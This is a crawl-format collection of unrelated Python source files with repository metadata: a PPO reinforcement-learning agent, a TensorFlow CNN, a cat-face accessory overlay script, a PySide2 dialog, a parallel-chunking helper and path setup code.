unmatched = types ^ names
if unmatched:
print('disturbance_types.csv - %s - %s ' % (self.parent.parent.country_iso2, unmatched))
# Non-forest #
default = set(self.aidb['tblAfforestationPreTypeDefault']['Name'])
names = self.key_to_rows(self.keys[4]).values()
print_messages(default, names, self.keys[4])
###############################################################################
if __name__ == '__main__':
checkers = [AssociationsChecker(c) for c in continent]
for checker in tqdm(checkers): checker()
| xapple/cbmcfs3_runner | scripts/associations/check_associations.py | check_associations.py | py | 4,628 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "autopaths.auto_paths.AutoPaths",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "plumbing.databases.access_database.AccessDatabase",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "plumbing.cache.property_cached",
"line_number": 46,
"usa... |
16721355609 | import torch
import torch.nn.functional as F
from torch.distributions import Normal
from torch.utils.data.sampler import BatchSampler, SubsetRandomSampler
from torch.nn.utils import clip_grad_norm_
from PPO_Continuous.version2.Network import Actor, Critic
class PPO(object):
def __init__(self,
state_dim,
action_dim,
lr_a=0.001,
lr_c=0.001,
reward_decay=0.99,
memory_size=1000,
batch_size=32,
update_times=10,
clip_param=0.2,
max_grad_norm=0.5,
device='cpu'):
self.state_dim = state_dim
self.action_dim = action_dim
self.lr_a = lr_a
self.lr_c = lr_c
self.gamma = reward_decay
self.capacity = memory_size
self.batch_size = batch_size
self.update_times = update_times
self.clip_param = clip_param
self.max_grad_norm = max_grad_norm
self.device = device
self.ReplayBuffer = []
self.counter = 0
self.actor = Actor(self.state_dim, self.action_dim)
self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=self.lr_a)
self.critic = Critic(self.state_dim)
self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=self.lr_c)
self.counter = 0
self.training_step = 0
def choose_action(self, state):
state = torch.from_numpy(state).float().unsqueeze(0)
mu, sigma = self.actor(state)
dist = Normal(mu, sigma)
action = dist.sample()
action_log_prob = dist.log_prob(action)
action = action.clamp(-2, 2)
return action.item(), action_log_prob.item()
def store_transition(self, transition):
self.ReplayBuffer.append(transition)
self.counter += 1
return self.counter % self.capacity == 0
def update(self):
old_state = torch.Tensor([t.state for t in self.ReplayBuffer]).float()
old_action = torch.Tensor([t.action for t in self.ReplayBuffer]).float().view(-1, 1)
reward = torch.Tensor([t.reward for t in self.ReplayBuffer]).float().view(-1, 1)
next_state = torch.Tensor([t.next_state for t in self.ReplayBuffer]).float()
old_action_log_prob = torch.Tensor([t.a_log_prob for t in self.ReplayBuffer]).float().view(-1, 1)
reward = (reward - reward.mean()) / (reward.std() + 1e-10)
with torch.no_grad():
gt = reward + self.gamma * self.critic(next_state)
for i in range(self.update_times):
for index in BatchSampler(SubsetRandomSampler(range(len(self.ReplayBuffer))), self.batch_size, False):
gt_value = gt[index].view(-1, 1)
value = self.critic(old_state[index])
advantage = (gt_value - value).detach()
mu, sigma = self.actor(old_state[index])
m = Normal(torch.squeeze(mu), torch.squeeze(sigma))
action_log_prob = m.log_prob(torch.squeeze(old_action[index])).view(-1, 1)
ratio = torch.exp(action_log_prob - old_action_log_prob[index])
surr1 = ratio * advantage
surr2 = torch.clamp(ratio, 1 - self.clip_param, 1 + self.clip_param) * advantage
action_loss = -torch.min(surr1, surr2).mean()
self.actor_optimizer.zero_grad()
action_loss.backward()
clip_grad_norm_(self.actor.parameters(), self.max_grad_norm)
self.actor_optimizer.step()
# update critic network
value_loss = F.mse_loss(gt_value, value)
self.critic_optimizer.zero_grad()
value_loss.backward()
clip_grad_norm_(self.critic.parameters(), self.max_grad_norm)
self.critic_optimizer.step()
self.training_step += 1
del self.ReplayBuffer[:]
| zhihangmuzi/deep-reinforcement-learning-with-pytorch | PPO_Continuous/version2/Agent.py | Agent.py | py | 3,981 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PPO_Continuous.version2.Network.Actor",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "torch.optim.Adam",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name"... |
12259799552 | from PySide2 import QtWidgets
import ui.devicesDialog_ui
import input.audio
class form(QtWidgets.QDialog, ui.devicesDialog_ui.Ui_Dialog):
def __init__(self):
super(form, self).__init__()
self.setupUi(self) #setup user interface
self.currentDevice = 0 #set default device
self.buttonBox.accepted.connect(self.btnOk_callback)
def show(self, audio: input.audio.audio):
self.lstDevices.clear()
for i in range (0, audio.getDeviceCount()):
devName = audio.getDeviceName(i)
if (devName != ""):
self.lstDevices.addItem(devName)
self.lstDevices.setCurrentRow(self.currentDevice)
super(form, self).show() #show dialog
self.activateWindow() #make sure window shows right away
def btnOk_callback(self):
self.currentDevice = self.lstDevices.currentRow()
def getCurrentDevice(self):
return self.currentDevice
| HamerKits/RoscoeQRSSViewer | devicesDialog.py | devicesDialog.py | py | 948 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PySide2.QtWidgets.QDialog",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "PySide2.QtWidgets",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "ui.devicesDialog_ui.devicesDialog_ui",
"line_number": 5,
"usage_type": "attribute"
},
... |
3270527178 | """
Model implementation.
"""
from helper import cache_func, INIT_METHODS
import tensorflow as tf
class CNNModel:
"""
CNN model implementation. Covers the implementations for both the large and the
compact network.
"""
def __init__(self, data, target, model_params, data_params):
self.data = data
self.target = target
self.params = model_params
self.data_params = data_params
# Weight initialization object arguments.
if self.params["weight_init"] == "gaussian":
init_args = {"mean": 0.0,
"stddev": 1}
else:
init_args = {}
if model_params["model_type"] == "large": # LargeNet Implementation.
self.num_layers = 9 # Number of conv. layers.
self.num_deep = 4 # Number of dense layers.
self.strides = [1, 1, 1, 1, 1, 1, 1, 1]
self.weight_dict = {"W_c_1": tf.compat.v1.get_variable(shape=(7, 7, self.data_params["input_dims"], 16),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_1"),
"b_c_1": tf.Variable(tf.zeros([16])),
"W_c_2": tf.compat.v1.get_variable(shape=(7, 7, 16, 16),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_2"),
"b_c_2": tf.Variable(tf.zeros([16])),
"W_c_3": tf.compat.v1.get_variable(shape=(5, 5, 16, 32),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_3"),
"b_c_3": tf.Variable(tf.zeros([32])),
"W_c_4": tf.compat.v1.get_variable(shape=(5, 5, 32, 32),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_4"),
"b_c_4": tf.Variable(tf.zeros([32])),
"W_c_5": tf.compat.v1.get_variable(shape=(5, 5, 32, 64),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_5"),
"b_c_5": tf.Variable(tf.zeros([64])),
"W_c_6": tf.compat.v1.get_variable(shape=(3, 3, 64, 128),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_6"),
"b_c_6": tf.Variable(tf.zeros([128])),
"W_c_7": tf.compat.v1.get_variable(shape=(3, 3, 128, 256),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_7"),
"b_c_7": tf.Variable(tf.zeros([256])),
"W_c_8": tf.compat.v1.get_variable(shape=(3, 3, 256, 512),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_c_8"),
"b_c_8": tf.Variable(tf.zeros([512])),
"W_1": tf.compat.v1.get_variable(shape=(34 ** 2 * 512, 512),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_1"),
"b_1": tf.Variable(tf.zeros([512])),
"W_2": tf.compat.v1.get_variable(shape=[512, 256],
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_2"),
"b_2": tf.Variable(tf.zeros([256])),
"W_3": tf.compat.v1.get_variable(shape=(256, 1),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_3"),
"b_3": tf.Variable(tf.zeros([1]))}
else: # Implementation of the compact network.
self.num_layers = 5
self.num_deep = 4
self.strides = [3, 1, 1, 1]
self.weight_dict = {"W_c_1": tf.compat.v1.get_variable(shape=(5, 5, self.data_params["input_dims"], 16),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_1"),
"b_c_1": tf.Variable(tf.zeros([16])),
"W_c_2": tf.compat.v1.get_variable(shape=(5, 5, 16, 32),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_2"),
"b_c_2": tf.Variable(tf.zeros([32])),
"W_c_3": tf.compat.v1.get_variable(shape=(3, 3, 32, 64),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_3"),
"b_c_3": tf.Variable(tf.zeros([64])),
"W_c_4": tf.compat.v1.get_variable(shape=(3, 3, 64, 128),
initializer=INIT_METHODS[self.params["weight_init"]](
**init_args),
name="W_c_4"),
"b_c_4": tf.Variable(tf.zeros([128])),
"W_1": tf.compat.v1.get_variable(shape=(10 ** 2 * 128, 1024),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_1"),
"b_1": tf.Variable(tf.zeros([1024])),
"W_2": tf.compat.v1.get_variable(shape=[1024, 256],
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_2"),
"b_2": tf.Variable(tf.zeros([256])),
"W_3": tf.compat.v1.get_variable(shape=(256, 1),
initializer=INIT_METHODS[self.params["weight_init"]](**init_args),
name="W_3"),
"b_3": tf.Variable(tf.zeros([1]))}
for key, val in self.weight_dict.items(): # Rename the layers.
self.weight_dict[key] = tf.identity(self.weight_dict[key], name=key)
# Flag indicating whether the current session is training or prediction.
self.training = tf.compat.v1.placeholder(tf.bool, shape=[])
self.layer_out = None
self.convs = {}
self.biass = {}
self.activations = {}
self.pools = {}
self.weight = {"W_c_1": None}
self.densed = {}
self.biased = {}
self.activated = {}
self.dense_weights = {}
self.bias_weights = {}
self._loss = None
# Initialize the lazy properties.
_ = self.optimize
_ = self.eval_loss
self.epoch_counter = 0
@cache_func
def predict(self):
"""
Forward function for the models.
:return: Output of the model.
"""
for c in range(1, self.num_layers):
if c == 1:
input_ = self.data
self.weight["W_c_1"] = tf.transpose(self.weight_dict["W_c_1"], [3, 0, 1, 2])
else:
input_ = pool
conv = tf.nn.conv2d(input_, self.weight_dict[f"W_c_{c}"], self.strides[c-1], "VALID")
self.convs[c] = tf.transpose(conv, [3, 0, 1, 2])
bias = tf.nn.bias_add(conv, self.weight_dict[f"b_c_{c}"])
self.biass[c] = tf.transpose(bias, [3, 0, 1, 2])
if self.params["batch_norm"]:
bias = tf.compat.v1.layers.batch_normalization(bias, axis=-1, training=self.training,
momentum=0.7)
activation = tf.nn.relu(bias)
self.activations[c] = tf.transpose(activation, [3, 0, 1, 2])
pool = tf.nn.pool(activation, (3, 3),
"MAX", padding="VALID")
self.pools[c] = tf.transpose(pool, [3, 0, 1, 2])
flatten = tf.compat.v1.layers.flatten(pool, name=None, data_format='channels_last')
layer_out = flatten
for d in range(1, self.num_deep):
densed = tf.matmul(layer_out, self.weight_dict[f"W_{d}"],
transpose_a=False, transpose_b=False)
self.densed[d] = densed
self.dense_weights[d] = self.weight_dict[f"W_{d}"]
layer_out = densed + self.weight_dict[f"b_{d}"]
self.biased[d] = layer_out
self.bias_weights = self.weight_dict[f"b_{d}"]
if self.params["batch_norm"]:
layer_out = tf.compat.v1.layers.batch_normalization(layer_out, axis=-1, training=self.training,
momentum=0.7)
if d != self.num_deep - 1:
layer_out = tf.nn.relu(layer_out)
self.activated[d] = layer_out
if self.params["dropout"]:
layer_out = tf.cond(self.training, lambda: tf.nn.dropout(layer_out, self.params["keep_rate"]),
lambda: layer_out)
return layer_out
@cache_func
def optimize(self):
"""
One step optimization for the specified loss function.
:return: optimizer.
"""
loss = self.loss
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.params["learning_rate"],
beta1=0.8, beta2=0.8)
train_op = optimizer.minimize(loss)
return train_op
@cache_func
def loss(self):
"""
Overall loss function that contains the data loss and the regularization losses.
:return: Overall loss.
"""
self._loss = self.data_loss
if self.params["l2_loss"]:
self._loss += self.l2_loss
return self._loss
@cache_func
def data_loss(self):
"""
Data loss from the label predictions.
:return: data loss.
"""
if self.params["loss_type"] == "l1":
loss = tf.reduce_mean(tf.abs(tf.subtract(self.target, self.predict)))
elif self.params["loss_type"] == "l2":
loss = tf.reduce_mean(tf.pow(tf.subtract(self.target, self.predict), 2))
else:
loss = 0.0
return loss
@cache_func
def eval_loss(self):
"""
Evaluation loss, L1.
:return: evaluation loss.
"""
loss = tf.reduce_mean(tf.abs(tf.subtract(self.target, tf.math.round(self.predict))))
return loss
@cache_func
def l2_loss(self):
"""
L2 regularization loss.
:return: Regularization loss.
"""
l2_loss = 0.0
for key, val in self.weight_dict.items():
l2_loss += self.params["alpha"] * tf.nn.l2_loss(val)
return l2_loss
def evaluate(self):
"""
:return:
"""
return tf.reduce_mean(tf.abs(tf.subtract(self.target, tf.math.round(self.predict))))
| Oguzhanka/face_attractiveness | models/cnn_model.py | cnn_model.py | py | 13,191 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.compat.v1.get_variable",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "tensorflow.compat",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "helper.INIT_METHODS",
"line_number": 31,
"usage_type": "name"
},
{
"api_... |
31635729829 | import os
import torch
import torchvision
import random
import pandas as pd
import numpy as np
import torch.nn as nn
import matplotlib.pyplot as plt
from PIL import Image
import cv2
import torch.nn.functional as F
import torchvision.transforms as transforms
import torchvision.models as models
from torch.utils.data import Dataset, random_split, DataLoader
from torchvision.datasets import ImageFolder
from torchvision import models
from torch import optim
from torchsummary import summary
from math import atan2, degrees
class CatPicture():
def __init__(self, filename):
self.which_p = 1
self.which_d = 1
self.wear_list = [0, 0, 0]
self.ori_filename = filename
tmp_idx = filename.rfind(".")
self.short_filename = filename[:tmp_idx]
def resize_img(im):
old_size = im.shape[:2] # old_size is in (height, width) format
ratio = float(img_size) / max(old_size)
new_size = tuple([int(x * ratio) for x in old_size])
# new_size should be in (width, height) format
im = cv2.resize(im, (new_size[1], new_size[0]))
delta_w = img_size - new_size[1]
delta_h = img_size - new_size[0]
top, bottom = delta_h // 2, delta_h - (delta_h // 2)
left, right = delta_w // 2, delta_w - (delta_w // 2)
new_im = cv2.copyMakeBorder(im, top, bottom, left, right, cv2.BORDER_CONSTANT,
value=[0, 0, 0])
return new_im, ratio, top, left
class CatDataset(Dataset):
def __init__(self, images, labels, transform):
self.imgs = images
self.labels = labels
self.transform = transform
def __len__(self):
return len(self.imgs) # return DataSet 長度
def __getitem__(self, idx):
image = self.imgs[idx]
image = image[..., ::-1].copy()
image = self.transform(image)
label = np.array(self.labels[idx])
return image, label # return 模型訓練所需的資訊
def Catface_dataloader(img):
test_inputs = []
test_inputs.append(img)
test_labels = [0 for i in range(4)]
test_dataloader = DataLoader(CatDataset(test_inputs, test_labels, test_transformer),
batch_size=1, shuffle=False)
return test_dataloader
def Lmks_dataloader(img):
test_inputs = []
test_inputs.append(img)
test_labels = [0 for i in range(18)]
test_dataloader = DataLoader(CatDataset(test_inputs, test_labels, test_transformer),
batch_size=1, shuffle=False)
return test_dataloader
class CatFaceModule(nn.Module):
def __init__(self):
super(CatFaceModule, self).__init__()
v = torch.hub.load('pytorch/vision:v0.6.0',
'mobilenet_v2', pretrained=True)
v.classifier[1] = nn.Linear(v.last_channel, 4)
self.layer1 = v
def forward(self, x):
out = self.layer1(x)
return out
class LmksModule(nn.Module):
def __init__(self):
super(LmksModule, self).__init__()
v = torch.hub.load('pytorch/vision:v0.6.0',
'mobilenet_v2', pretrained=True)
v.classifier[1] = nn.Linear(v.last_channel, 18)
self.layer1 = v
def forward(self, x):
out = self.layer1(x)
return out
# main program
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
img_size = 224
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
test_transformer = transforms.Compose([
transforms.ToTensor(),
normalize
])
# the path of models
cat_face_model_path = "mobilenet_RMSELoss500.ph"
lmks_model_path = "mobilenet_RMSELoss100_36.ph"
# load the models
cat_model = CatFaceModule().to(device)
cat_model.load_state_dict(torch.load(cat_face_model_path))
cat_model.eval()
lmks_model = LmksModule().to(device)
lmks_model.load_state_dict(torch.load(lmks_model_path))
lmks_model.eval()
# the path of the image you want to test
img_path = filename
# read the image
img = cv2.imread(img_path)
ori_img = img.copy()
result_img = img.copy()
img, ratio, top, left = resize_img(img)
# plt.figure()
# plt.imshow(img)
predicted = []
# catface predicted
catface_dataloader = Catface_dataloader(img)
for i, (x, label) in enumerate(catface_dataloader):
with torch.no_grad():
x, label = x.to(device), label.to(device)
output = cat_model(x)
# loss = criterion(output, label.long())
predicted = output.data[0].reshape((-1, 2))
# the position of the cat face box
pre_bb = predicted.cpu().numpy()
# print(pre_bb)
# the positoin of the cat face box when it at the origin image
ori_bb = ((pre_bb - np.array([left, top])) / ratio).astype(np.int)
# print(ori_bb)
# cut the face image
center = np.mean(ori_bb, axis=0)
face_size = max(np.abs(ori_bb[1] - ori_bb[0]))
new_bb = np.array([
center - face_size * 0.6,
center + face_size * 0.6
]).astype(np.int)
new_bb = np.clip(new_bb, 0, 99999)
face_img = ori_img[new_bb[0][1]:new_bb[1]
[1], new_bb[0][0]:new_bb[1][0]]
# plt.figure()
# plt.imshow(face_img)
face_img, face_ratio, face_top, face_left = resize_img(face_img)
# landmark prediction
lmks_dataloader = Lmks_dataloader(face_img)
for i, (x, label) in enumerate(lmks_dataloader):
with torch.no_grad():
x, label = x.to(device), label.to(device)
output = lmks_model(x)
# loss = criterion(output, label.long()) # 計算測試資料的準確度
predicted = output.data[0].reshape((-1, 2))
pred_lmks = predicted.cpu().numpy()
# print(pred_lmks)
new_lmks = (
(pred_lmks - np.array([face_left, face_top])) / face_ratio).astype(np.int)
self.ori_lmks = new_lmks + new_bb[0]
ori_img = cv2.cvtColor(ori_img, cv2.COLOR_BGR2RGB)
# initial cat
self.ori_pic = result_img
tmp_filename = self.short_filename + "_000.jpg"
cv2.imwrite(tmp_filename, result_img)
# main end
def angle_between(self, p1, p2):
xDiff = p2[0] - p1[0]
yDiff = p2[1] - p1[1]
return degrees(atan2(yDiff, xDiff))
def overlay_transparent(self, background_img, img_to_overlay_t, x, y, overlay_size=None):
bg_img = background_img.copy()
# convert 3 channels to 4 channels
if bg_img.shape[2] == 3:
bg_img = cv2.cvtColor(bg_img, cv2.COLOR_BGR2BGRA)
if overlay_size is not None:
img_to_overlay_t = cv2.resize(
img_to_overlay_t.copy(), overlay_size)
b, g, r, a = cv2.split(img_to_overlay_t)
for i in range(len(a)):
for j in range(len(a[0])):
if a[i][j] < 200:
a[i][j] = 0
#mask = cv2.medianBlur(a, 5)
mask = a
h, w, _ = img_to_overlay_t.shape
roi = bg_img[int(y - h / 2):int(y + h / 2),
int(x - w / 2):int(x + w / 2)]
img1_bg = cv2.bitwise_and(roi.copy(), roi.copy(),
mask=cv2.bitwise_not(mask))
img2_fg = cv2.bitwise_and(
img_to_overlay_t, img_to_overlay_t, mask=mask)
bg_img[int(y - h / 2):int(y + h / 2), int(x - w / 2) :int(x + w / 2)] = cv2.add(img1_bg, img2_fg)
# convert 4 channels to 4 channels
bg_img = cv2.cvtColor(bg_img, cv2.COLOR_BGRA2BGR)
return bg_img
def setWearList(self, which_pattern):
self.wear_list[self.which_d] = which_pattern
def CreateBasePic(self):
tmp_list = self.wear_list[:]
tmp_list[self.which_d] = 0
base_filepath = self.short_filename + "_" + \
str(tmp_list[0]) + str(tmp_list[1]) + str(tmp_list[2]) + ".jpg"
if os.path.isfile(base_filepath):
return
self.WearHat(tmp_list[0], 0, 0)
self.WearBow(tmp_list[0], tmp_list[1], 0)
self.WearGlasses(tmp_list[0], tmp_list[1], tmp_list[2])
def WearDecorate(self):
self.CreateBasePic()
if self.which_d == 0:
self.WearHat(self.wear_list[0],
self.wear_list[1], self.wear_list[2])
elif self.which_d == 1:
self.WearBow(self.wear_list[0],
self.wear_list[1], self.wear_list[2])
else:
self.WearGlasses(self.wear_list[0],
self.wear_list[1], self.wear_list[2])
new_name = self.short_filename + "_" + \
str(self.wear_list[0]) + str(self.wear_list[1]
) + str(self.wear_list[2]) + ".jpg"
return new_name
def WearHat(self, h_n, b_n, g_n):
if h_n == 0:
return
# add hat
hat_name = "hat" + str(h_n) + ".png"
hat = cv2.imread(hat_name, cv2.IMREAD_UNCHANGED)
hat_center = np.mean([self.ori_lmks[5], self.ori_lmks[6]], axis=0)
hat_size = np.linalg.norm(self.ori_lmks[5] - self.ori_lmks[6]) * 3
angle = -self.angle_between(self.ori_lmks[5], self.ori_lmks[6])
M = cv2.getRotationMatrix2D(
(hat.shape[1] / 2, hat.shape[0] / 2), angle, 1)
rotated_hat = cv2.warpAffine(hat, M, (hat.shape[1], hat.shape[0]))
base_name = self.short_filename + "_" + \
"0" + str(b_n) + str(g_n) + ".jpg"
new_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + str(g_n) + ".jpg"
base_pic = cv2.imread(base_name)
try:
cat = self.overlay_transparent(base_pic, rotated_hat, hat_center[0], hat_center[1], overlay_size=(
int(hat_size), int(hat.shape[0] * hat_size / hat.shape[1])))
except:
print('failed overlay image')
cv2.imwrite(new_name, cat)
def WearBow(self, h_n, b_n, g_n):
if b_n == 0:
return
# add bow
bow_name = "bow" + str(b_n) + ".png"
bow = cv2.imread(bow_name, cv2.IMREAD_UNCHANGED)
bow_center = np.mean([self.ori_lmks[3], self.ori_lmks[5]], axis=0)
bow_size = np.linalg.norm(self.ori_lmks[3] - self.ori_lmks[5]) * 1.5
angle = -self.angle_between(self.ori_lmks[3], self.ori_lmks[5])
M = cv2.getRotationMatrix2D(
(bow.shape[1] / 2, bow.shape[0] / 2), angle, 1)
rotated_bow = cv2.warpAffine(bow, M, (bow.shape[1], bow.shape[0]))
base_name = self.short_filename + "_" + \
str(h_n) + "0" + str(g_n) + ".jpg"
new_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + str(g_n) + ".jpg"
base_pic = cv2.imread(base_name)
cat = self.overlay_transparent(base_pic, rotated_bow, bow_center[0], bow_center[1], overlay_size=(
int(bow_size), int(bow.shape[0] * bow_size / bow.shape[1])))
cv2.imwrite(new_name, cat)
def WearGlasses(self, h_n, b_n, g_n):
# add glasses
if g_n == 0:
return
glasses_name = "glasses" + str(g_n) + ".png"
glasses = cv2.imread(glasses_name, cv2.IMREAD_UNCHANGED)
glasses_center = np.mean([self.ori_lmks[0], self.ori_lmks[1]], axis=0)
glasses_size = np.linalg.norm(
self.ori_lmks[0] - self.ori_lmks[1]) * 2.5
angle = -self.angle_between(self.ori_lmks[0], self.ori_lmks[1])
M = cv2.getRotationMatrix2D(
(glasses.shape[1] / 2, glasses.shape[0] / 2), angle, 1)
rotated_glasses = cv2.warpAffine(
glasses, M, (glasses.shape[1], glasses.shape[0]))
base_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + "0" + ".jpg"
new_name = self.short_filename + "_" + \
str(h_n) + str(b_n) + str(g_n) + ".jpg"
base_pic = cv2.imread(base_name)
cat = self.overlay_transparent(base_pic, rotated_glasses, glasses_center[0], glasses_center[1], overlay_size=(
int(glasses_size), int(glasses.shape[0] * glasses_size / glasses.shape[1])))
cv2.imwrite(new_name, cat)
| a20815579/cat_face_detection | cat_CNN.py | cat_CNN.py | py | 13,278 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "cv2.resize",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "cv2.copyMakeBorder",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "cv2.BORDER_CONSTANT",
"line_number": 47,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.da... |
21848108182 | import numpy as np
from sklearn.externals.joblib import Parallel, delayed
from multiprocessing import cpu_count
def apply_parallel_joblib(func, data, *args, chunk=None, overlap=10,
n_jobs=None, **kwargs):
"""
Apply a function in parallel to overlapping chunks of an array
Parameters
----------
func : function
name of function. Its first argument needs to be ``data``
data : ndarray
data to be chunked
chunk : int
chunk size (default value 100)
overlap : int
size of overlap between consecutive chunks
n_jobs : int
number of jobs to be used by joblib for parallel processing
*args, **kwargs : other arguments to be passed to func
Examples
--------
>>> from skimage import data, filters
>>> coins = data.coins()
>>> res = apply_parallel_joblib(filters.gaussian, coins, 2)
"""
if chunk is None:
l = len(data)
try:
ncpu = cpu_count()
except NotImplementedError:
ncpu = 4
chunk = l // ncpu
if n_jobs is None:
n_jobs = -1
sh0 = data.shape[0]
nb_chunks = sh0 // chunk
end_chunk = sh0 % chunk
arg_list = [data[max(0, i*chunk - overlap):
min((i+1)*chunk + overlap, sh0)]
for i in range(0, nb_chunks)]
if end_chunk > 0:
arg_list.append(data[-end_chunk - overlap:])
res_list = Parallel(n_jobs=n_jobs, backend="threading")(delayed(func)
(sub_im, *args, **kwargs) for sub_im in arg_list)
output_dtype = res_list[0].dtype
out_data = np.empty(data.shape, dtype=output_dtype)
for i in range(1, nb_chunks):
out_data[i*chunk:(i+1)*chunk] = res_list[i][overlap:overlap+chunk]
out_data[:chunk] = res_list[0][:-overlap]
if end_chunk>0:
out_data[-end_chunk:] = res_list[-1][overlap:]
return out_data
| emmanuelle/skimage-sprint | chunk_joblib.py | chunk_joblib.py | py | 1,921 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "multiprocessing.cpu_count",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "sklearn.externals.joblib.Parallel",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "sklearn.externals.joblib.delayed",
"line_number": 57,
"usage_type": "call"
... |
24396409804 | import logging
logger = logging.getLogger(__name__)
def do_something():
logger.debug(
'Detailed information, typically of interest only when diagnosing problems.')
logger.info('Confirmation that things are working as expected.')
logger.warning(
'An indication that something unexpected happened. The software is still working as expected.')
logger.error(
'Due to a more serious problem, the software has not been able to perform some function.')
logger.critical(
'A serious error, indicating that the program itself may be unable to continue running.')
def fail_something():
raise SystemError()
| jmhart/python-template | src/stuff/thing.py | thing.py | py | 656 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 3,
"usage_type": "call"
}
] |
2986896269 | import os
import h5py
import numpy as np
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
if 'KAGGLE_BASE_URL' in os.environ:
challenge = 'g2net-detecting-continuous-gravitational-waves'
PATH_TO_TEST_FOLDER = os.path.join('/kaggle', 'input', challenge, 'test')
PATH_TO_TRAIN_FOLDER = os.path.join('/kaggle', 'input', challenge, 'train')
PATH_TO_LABEL_FILE = os.path.join('/kaggle', 'input', challenge, 'train_labels.csv')
PATH_TO_MODEL_FOLDER = os.path.join('/kaggle', 'input', 'models')
PATH_TO_LOG_FOLDER = os.path.join('/kaggle', 'temp', 'logs')
PATH_TO_CACHE_FOLDER = os.path.join('/kaggle', 'working', 'cache')
PATH_TO_SIGNAL_FOLDER = os.path.join('/kaggle', 'working', 'signal')
PATH_TO_NOISE_FOLDER = os.path.join('/kaggle', 'working', 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
PATH_TO_SOURCE_FOLDER = os.path.join('/kaggle', 'working', 'src')
else:
PATH_TO_TEST_FOLDER = os.path.join(os.getcwd(), 'test_data')
PATH_TO_TRAIN_FOLDER = os.path.join(os.getcwd(), 'train_data')
PATH_TO_MODEL_FOLDER = os.path.join(os.getcwd(), 'models_saved')
PATH_TO_LOG_FOLDER = os.path.join(os.getcwd(), 'logs')
PATH_TO_CACHE_FOLDER = os.path.join(os.getcwd(), 'cache')
PATH_TO_LABEL_FILE = os.path.join(os.getcwd(), 'train_labels.csv')
PATH_TO_SIGNAL_FOLDER = os.path.join(os.getcwd(), 'signal')
PATH_TO_NOISE_FOLDER = os.path.join(os.getcwd(), 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
PATH_TO_TMP_FOLDER = os.path.join(os.getcwd(), 'tmp')
PATH_TO_SOURCE_FOLDER = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))
# setup
if not os.path.isdir(PATH_TO_TRAIN_FOLDER):
os.makedirs(PATH_TO_TRAIN_FOLDER)
if not os.path.isdir(PATH_TO_TEST_FOLDER):
os.makedirs(PATH_TO_TEST_FOLDER)
if not os.path.isdir(PATH_TO_MODEL_FOLDER):
os.makedirs(PATH_TO_MODEL_FOLDER)
if not os.path.isdir(PATH_TO_LOG_FOLDER):
os.makedirs(PATH_TO_LOG_FOLDER)
if not os.path.isdir(PATH_TO_CACHE_FOLDER):
os.makedirs(PATH_TO_CACHE_FOLDER)
if not os.path.isdir(PATH_TO_NOISE_FOLDER):
os.makedirs(PATH_TO_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_SIGNAL_FOLDER):
os.makedirs(PATH_TO_SIGNAL_FOLDER)
if not os.path.isdir(PATH_TO_DYNAMIC_NOISE_FOLDER):
os.makedirs(PATH_TO_DYNAMIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_STATIC_NOISE_FOLDER):
